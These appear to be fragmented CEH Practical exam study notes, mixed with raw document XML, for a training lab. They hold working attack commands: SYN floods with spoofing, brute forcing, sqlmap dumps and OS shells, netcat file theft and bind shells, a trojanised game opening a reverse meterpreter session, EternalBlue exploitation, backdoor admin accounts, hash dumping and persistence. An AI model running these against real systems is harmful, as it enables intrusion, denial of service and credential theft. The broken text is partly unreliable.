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CEH-v12-Practical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03: Scanning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Lab1-Task1: Host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-PR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Disable port scan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ARP ping scan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-PU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-PU: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UDP ping scan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-PE [IP or IP Range]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ICMP ECHO ping scan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-PP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-PP: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ICMP timestamp ping scan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-PM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ICMP address mask ping scan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-PS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 SYN Ping scan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-PA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 ACK Ping scan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-PO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IP Protocol Ping scan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Lab2-Task3: Port and Service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-sT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 connect/full open scan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Verbose output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-sS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Stealth scan/TCP hall-open scan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-sX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-sX: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Xmax scan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-sM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 Maimon scan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-sA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ACK flag probe scan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-sU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-sU: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UDP scan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-sI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IDLE/IPID Header scan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-sY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SCTP INIT Scan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-sZ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-sZ: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SCTP COOKIE ECHO Scan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-sV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-sV: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Detect service versions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-A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Aggressive scan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Lab3-Task2: OS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-A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Aggressive scan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-O -v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discovery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–script smb-os-discovery.nse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-–script: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Specify the customized script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smb-os-discovery.nse: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Determine the OS, computer name, domain, workgroup, and current time over the SMB protocol (Port 445 or 139)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04: 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Lab2-Task1: Enumerate SNMP using snmp-check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-sU -p 161 [IP]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snmp-check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nbtstat -a [IP] (Windows)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nbtstat -c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06: System Hacking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Lab1-Task1: Perform Active Online Attack to Crack the System's Password using Responder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Responder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chmox +x ./Responder.py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./Responder.py -I eth0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passwd: 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\CEH-Tools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Home/Responder/logs/SMB-NTMLv2-SSP-[IP].txt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snap install john-the-ripper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passwd: ****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john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt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Lab3-Task6: Covert Channels using Covert_TCP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Desktop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Send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Send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"Secret"-&gt;message.txt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Place-&gt;Network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smb://[IP]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&amp; Password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covert_tcp.c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-o covert_tcp covert_tcp.c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tcpdump -nvvx port 8888 -I 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Desktop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Receive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Receive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File-&gt;Ctrl+L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smb://[IP]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covert_tcp.c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-o covert_tcp covert_tcp.c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./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt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Tcpdump captures no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./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 8888 -dest_port 9999 -file /home/attacker/Desktop/send/message.txt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 (message string being send in individual packet)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08: Sniffing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Lab2-Task1: Password Sniffing using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www.moviescope.com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capture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File-&amp;gt;Save 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http.request.method==POST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RDP log in Target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Remote Packet Capture Protocol v.0 (experimental)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off Target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Wireshark-&amp;gt;Capture options-&amp;gt;Manage Interface-&amp;gt;Remote Interfaces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remote host and its interface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info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website and log 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packets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10: Denial-of-Service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Lab1-Task2: Perform a DoS Attack on a Target Host using hping3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Wireshark-&amp;gt;Ethernet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hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood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-S: Set the SYN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-a: Spoof the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-p: Specify the destination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–flood: Send a huge number of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wireshark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 (Perform PoD)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hping3 -d 65538 -S -p 21 –flood [Target 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-d: Specify data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-S: Set the SYN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Attacker (Perform UDP application layer flood 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-p 139 10.10.10.19 (check service)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hping3 -2 -p 139 –flood [IP]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-2: Specify UDP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UDP-based applications and their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CharGen UDP Port 19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SNMPv2 UDP Port 161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QOTD UDP Port 17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RPC UDP Port 135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SSDP UDP Port 1900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CLDAP UDP Port 389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TFTP UDP Port 69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NetBIOS UDP Port 137,138,139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NTP UDP Port 123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Quake Network Protocol UDP Port 26000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VoIP UDP Port 5060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13: Hacking Web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Lab2-Task1: Crack FTP Credentials using a Dictionary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-p 21 [IP]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hydra -L usernames.txt -P passwords.txt ftp://10.10.10.10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14: Hacking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Lab2-Task1: Perform a Brute-force Attack using Burp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proxy for browser: 127.0.0.1:8080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Burpsuite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random credentials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 the request, right click-&amp;gt;send to Intrucder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Intruder-&amp;gt;Positions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$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 type: Cluster bomb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account and password value, Add $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Payloads: Load wordlist file for set 1 and set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attack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status==302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raw, get the credentials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recover proxy settings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Lab2-Task3: Exploit Parameter Tampering and XSS Vulnerabilities in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a website, change the parameter value (id )in the URL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a XSS attack: Submit script codes via text area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Lab2-Task5: Enumerate and Hack a Web Application using WPScan and Metasploit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wpscan –api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads –url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http://10.10.10.16:8080/CEH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–plugins-detection aggressive –enumerate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–enumerate u: Specify the enumeration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Token: Register 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https://wpscan.com/register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Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads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postgresql start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msfconsole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auxiliary/scanner/http/wordpress_login_enum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options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PASS_FILE password.txt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RHOST 10.10.10.16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RPORT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TARGETURI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http://10.10.10.16:8080/CEH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USERNAME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credential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Lab2-Task6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level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found command injection vulnerability in an input textfield</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5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C6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tasklist| Taskkill /PID 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/PID: Process ID value od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/F: Forcefully terminate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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dir C:\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net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net user user001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net user user001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net localgroup Administrators user001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created account user001 to log in remotely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15: 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Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap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 website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Inspect element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 tools-&amp;gt;Console: document.cookie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sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" –cookie="value" –dbs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-u: Specify the target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–cookie: Specify the HTTP cookie header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–dbs: Enumerate DBMS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 list of databases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database to extract its tables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sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" –cookie="value" -D moviescope –tables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-D: Specify the DBMS database to enumerate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–tables: Enumerate DBMS database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 list of tables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column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sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" –cookie="value" -D moviescope –T User_Login –dump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table data of this column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sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" –cookie="value" –os-shell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OS Shell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TASKLIST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17: Hacking Mobile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1-Task 4: Exploit the Android Platform through ADB using PhoneSploit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cd Phonesploit - python3 -m pip install colorama - python3 phonesploit.py - 3 - 10.10.10.14 - 4 - pwd - cd sdcard - cd Download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20: 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Lab1-Task2: Calculate MD5 Hashes using MD5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Nothing special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Lab4-Task1: Perform Disk Encryption using VeraCrypt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VeraCrypt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Volumn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encrypted file container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a path and file name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password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NAT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mouse randomly for some seconds, and click Format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drive, select file, open, mount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password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Appendix: Covered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Labs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13: Lab2-Task1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15: Lab1-Task2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14: Lab2-Task5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wpscan –-url http://10.10.10.10 -t 50 -U admin -P rockyou.txt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https://zhuanlan.zhihu.com/p/124246499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06: Lab1-Task1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 MD5 passwords with a wordlist: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hashcat hash.txt -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt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 MD5 passwords in a certain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hashcat -m 0 -a 3 ./hash.txt 'SKY-HQNT-?d?d?d?d'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https://xz.aliyun.com/t/4008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https://tools.kali.org/password-attacks/hashcat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Metasploit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14: Lab2-Task5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Responder LLMNR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06: Lab1-Task1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Wireshark or Tcpdump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Labs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Steghide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steghide embed -cf [img file] -ef [file to be hide]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steghide embed -cf 1.jpg -ef 1.txt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password or skip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steghide info 1.jpg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steghide extract -sf 1.jpg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password if it does exist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https://www.openstego.com/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QuickStego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06: Lab0-Task1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Dirb (Web content scanner)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https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c86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https://blog.csdn.net/weixin_44912169/article/details/105655195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Searchsploit (Exploit-DB)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https://www.hackingarticles.in/comprehensive-guide-on-searchsploit/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Crunch (wordlist generator)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https://www.cnblogs.com/wpjamer/p/9913380.html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Cewl (URL spider)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https://www.freebuf.com/articles/network/190128.html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Veracrypt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20: Lab4-Task1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Hashcalc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20: Lab1-Task1 (Nothing special)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Rainbow Crack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06: Lab0-Task0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SMB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smbclient -L [IP]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smbclient \ip\sharename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-p 445 -sV –script smb-enum-services [IP]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Nmap at the beginning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-sn -PR 192.168.1.1/24 -oN ip.txt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-A -T4 -vv -iL ip.txt -oN nmap.txt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nmap -sU -sV -A -T4 -v -oN udp.txt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./snow -C -p “magic” output.txt</w:t>
        <w:br w:type="textWrapping"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snow -C -m “Secret Text Goes Here!” -p “magic” readme.txt readme2.txt • -m → Set your message • -p → Set your password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Rainbowcrack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Winrtgen to generate a rainbow table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RainbowCrack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File-&gt;Load NTLM Hashes from PWDUMP File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Rainbow Table-&gt;Search Rainbow Table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generated rainbow table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RainbowCrack automatically starts to crack the hashes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QuickStego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QuickStego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Image, and select target .jpg file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Text, and select a txt file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 text, save image file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Re-launch, Open Image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stego file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Hidden text shows up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Links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tools info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https://github.com/Adityaraj6/CEH-CheatSheet/blob/main/CMD%20CheatSheet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https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganograp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 by step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https://github.com/DarkLycn1976/CEH-Practical-Notes-and-Tools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category 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88"/>
        </w:numPr>
        <w:spacing w:after="18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https://github.com/nirangadh/ceh-practical/tree/main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DNS N NSLOOKUP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type=a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domain www.certifiedhacker.com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type=cname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www.certifiedhacker.com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type=a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ns1.bluehost.com</w:t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ICMP ECHO N ARP PINGS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Be sure to replace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92.168.252 with YOUR subnet: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ifconfig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ipconfig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ping &lt;XP-PRO IP&gt;</w:t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ctrl+c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clear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icmp&amp;&amp;ip.dst==&lt;XP-PRO IP&gt;</w:t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icmp&amp;&amp;ip.addr==&lt;XP-PRO IP&gt;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i in {1..254} ;do (ping -c 1 192.168.252.$1 | grep "bytes from" &amp;) ;done</w:t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icmp&amp;&amp;ip.dst!=&lt;KALI IP&gt;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-sP -PR 192.168.252.0/24</w:t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</w:t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eth.addr==&lt;KALI MAC Address&gt;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--disable-arp-ping -sP -PE 192.168.252.0/24 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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HOST DISCOVERY WITH NMAP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Be sure to change the IP addresses to the ones you have</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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-sL scanme.nmap.org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-sn 192.168.252.0/24</w:t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-Pn 192.168.252.128-132</w:t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-PS -p80 192.168.252.128-132</w:t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-PA -p80 192.168.252.128-132</w:t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-PU 192.168.252.128-132</w:t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</w:t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-sP -PU 192.168.252.128-132</w:t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-sP -PY 192.168.252.128-132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-sP -PE 192.168.252.128-132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nmap -sP -PP 192.168.252.128-132</w:t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-n 8.8.4.4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-R 8.8.4.4</w:t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HPING3 PACKET CRAFTING </w:t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 Terminal 1:</w:t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tcpdump</w:t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ctrl+c</w:t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tcpdump -v -n -X dst &lt;metasploitable IP&gt; and src &lt;Kali IP&gt;</w:t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 Terminal 2:</w:t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clear</w:t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hping3 -h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clear</w:t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hping3 --scan 1-200 &lt;metasploitable IP&gt;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hping3 --udp --scan 1-200 &lt;metasploitable IP&gt;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hping3 -S -c 1 -p 21 -s 5150 &lt;metasploitable IP&gt;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hping3 -S -c 1 -s 5150 &lt;metasploitable IP&gt;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hping3 -S -c 1 -p 80 -s 5150 &lt;metasploitable IP&gt;</w:t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hping3 -S -c 1 -p 70 -s 5150 &lt;metasploitable IP&gt;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hping3 -A -c 1 -p 70 -s 5150 &lt;metasploitable IP&gt;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hping3 -SA -c 1 -p 80 -s 5150 &lt;metasploitable IP&gt;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hping3 -R -c 1 -p 80 -s 5150 &lt;metasploitable IP&gt;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hping3 -FA -c 1 -p 80 -s 5150 &lt;metasploitable IP&gt;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hping3 -U -P -F -c 1 -p 80 -s 5150 &lt;metasploitable IP&gt;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Create a file named get in /root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Enter this one line in the file and save it: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 / HTTP/1.1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hping3 -c 1 -p 80 -A -d 20 --file /root/get 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NMAP BASIC SCANS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Basic NMAP Scans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Note: Be sure to change the IP addresses to suit your environment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Scan a Single Target  nmap [target]</w:t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&lt;metasploitable IP&gt;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scanme.nmap.org</w:t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Scan Multiple Targets  nmap [target1, target2, etc]</w:t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&lt;Server2016 IP&gt; &lt;XP-PRO IP&gt;</w:t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Scan a Range of Hosts  nmap [range of ip addresses]</w:t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192.168.2252.128-132</w:t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Scan an Entire Subnet  nmap [ip address/CIDR]</w:t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nmap 192.168.252.0/24</w:t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USING NETCAT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Netcat</w:t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Server2016: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netcat files are in C:\tools\netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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the folder c:\secret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text files with some text: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C:\secret\payments.txt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C:\secret\confidential.txt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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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home/kali/haha.txt with some text </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Unless noted:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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"server" = Server2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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"client" = Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Obtain and record IP addresses for both VMs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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D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Make a simple client/server connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Can be used as a basic chat service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Server2016:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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cd c:\tools\netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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</w:t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cls</w:t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-Lnvp 1234</w:t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</w:t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-vn 192.168.6.132 1234</w:t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either:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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Hello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the other:</w:t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What's up?</w:t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Both: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Ctrl+c</w:t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Server delivers a file to the client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when the client connects</w:t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Server2016:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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-w 5 -Lnvp 5555 &lt; C:\secret\confidential.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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-w 5 -nv 192.168.6.132 5555 &gt; confidential.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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Both:</w:t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Ctrl+c</w:t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Client uploads a file to the server</w:t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Server2016:</w:t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-w 5 -Lnvp 7777 &gt; C:\Users\Administrator\Desktop\haha.txt</w:t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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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-w 5 -nv &lt;Server IP&gt; 7777 &lt; haha.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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Both:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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Ctrl+c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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20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Install ncat on Kali</w:t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sudo apt install ncat</w:t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KALI will use TWO terminals</w:t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 Terminal 1</w:t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ncat -l -n -v -w 5 -k 9999 &gt; payments.txt</w:t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Server provides a reverse shell </w:t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the client connects</w:t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Server2016:</w:t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-Lnvp 8888 -e cmd.exe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 Terminal 2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-nv 192.168.6.132 8888</w:t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user hakker 1Password /add</w:t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user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localgroup administrators /add hakker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localgroup administrators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nc -w 5 -nv 192.168.6.128 9999 &lt; C:\secret\payments.txt</w:t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Server2016:</w:t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data to payments.txt</w:t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Kali: Terminal 2</w:t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(Repeat last command)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Kali:</w:t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 payments.txt for new data.</w:t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Both:</w:t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Ctrl+c</w:t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PIVOTING ATTACK</w:t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Kali:</w:t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Prepare a handler to receive the malware connection on port 80</w:t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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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3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lhost 172.16.0.200</w:t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lport 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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3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3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On XP-PRO:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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Double-click minecraft-mini.exe to "play" the game</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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On Kali: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Verify that the infected game connected to your handler, </w:t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that you have a meterpreter&gt; prompt</w:t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Determine the internal subnet ID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At the meterpreter&gt; prompt enter:</w:t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getuid</w:t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getsystem</w:t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getuid</w:t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route (identify the internal IP subnet)</w:t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background</w:t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sessions (make note of the meterpreter session #)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Create a pivot using meterpreter as a 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pipeline into the internal network</w:t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autoroute</w:t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post/multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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session 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Conduct a ping sweep of the internal network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ping_sweep </w:t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post/multi/gather/ping_sweep</w:t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rhosts 10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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session 1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    (make note of the discovered IP addresses)</w:t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Port scan the internal hosts</w:t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portscan</w:t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auxiliary/scanner/portscan/tcp</w:t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6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ports 80,135,139,445,1433,3389</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026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rhosts 10.10.10.10-12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026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ID the internal host OS versions</w:t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scanner/smb</w:t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auxiliary/scanner/smb/smb_version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6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rhosts 10.10.10.10-12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026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threads 3</w:t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  (see if the scan identifies the OS-is one of them Server 2016?)</w:t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Attempt an Eternal Blue PSEXEC buffer overflow attack against Server2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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eternal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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&lt;exploit/windows/smb/ms17_010_psexec&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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7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payload windows/x64/meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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payload windows/x64/meterpreter/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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rhosts &lt;server2016 IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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lhost &lt;Kali IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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smbuser moo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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smbpass 1Password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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7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7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Get information from Server2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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getuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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Drop to a Windows command prompt (shell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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shell</w:t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Create a backdoor administrator account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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user haxxor Letmein! /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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localgroup administrators /add haxxor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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Return to meterpreter and dump Server2016 password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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sessions 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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post/windows/gather/smart_hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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9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session 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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9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INSTALLING A PERSISTENT BACKDOOR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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VMs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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Server2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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Verify IP addresses of both VMs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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2A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Eternal Blue PSEXEC to compromise Server2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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exploit/windows/smb/ms17_010_psexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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rhosts 192.168.6.136</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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lhost 192.168.6.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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smbpass 1Password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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smbuser moo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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A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background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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exploit/windows/local/persistence_service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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session &lt;session ID&gt;</w:t>
      </w:r>
    </w:p>
